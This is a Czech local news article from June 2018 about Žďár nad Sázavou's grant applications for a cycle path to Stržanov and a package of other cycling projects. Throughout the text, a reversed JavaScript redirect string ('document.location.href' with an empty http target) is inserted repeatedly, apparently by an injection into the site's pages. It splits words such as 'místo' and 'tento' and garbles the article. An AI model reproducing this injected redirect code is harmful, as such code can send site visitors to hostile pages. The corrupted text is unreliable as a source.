Rainbow page separator

Ve Žďáře zatím neví, která z dotací podpoří novou cyklostezku

Neděle, 17. června 2018

Cyklostezka

Žďár nad Sázavou / Na [„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to, jak dopadne druhá žádost o dotaci na cyklostezku vedoucí od Pilské nádrže do Stržanova, čeká žďárská radnice. Na tu[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to stavební akci již měs[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to získalo příslib dotační podpory ze Státního fondu dopravní infrastruktury ve výši více než deset milionů korun. V další žádosti o příspěvek, ten[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tokrát z Integrovaného regionálního operačního programu, však měs[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to žádalo nejenom o podporu výstavby cyklostezky do Stržanova, ale i dalších čtyř projektů pro podporu cyklistiky ve Žďáře za celkem 25,9 milionu korun. Mimo již zmíněnou stezku jde o úsek s mostkem přes Sázavu u mostu v ulici Sázavská, třetím projektem v „balíčku“ usilujícím o evropskou podporu je cyklostezka od Modrého hřiště, dále pod mostem, okolo Jermářova jezu s pokračováním podél břehu Sázavy k napojení na ulici Žižkova a přes lávku. Čtvrtým záměrem je lávka přes řeku ve Farských humnech od výše uvedené nové stezky až po napojení na cyklostezku ve Farských humnech a poslední součástí projektu jsou pik[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];togramové koridory propojující stávající cyklostezku od ulice 1. máje až po nádraží přes ulice Husova a Nádražní.
Pokud by Žďár uspěl i s [„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tou[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to žádostí o dotační podporu, použil by ji, neboť by tak mohlo naráz vzniknout více cyklostezek. V opačném případě bude na novou cyklostezku do Stržanova využita již přislíbená dotace ze Státního fondu dopravní infrastruktury a realizace dalších úseků pro cyklisty ve městě se posune.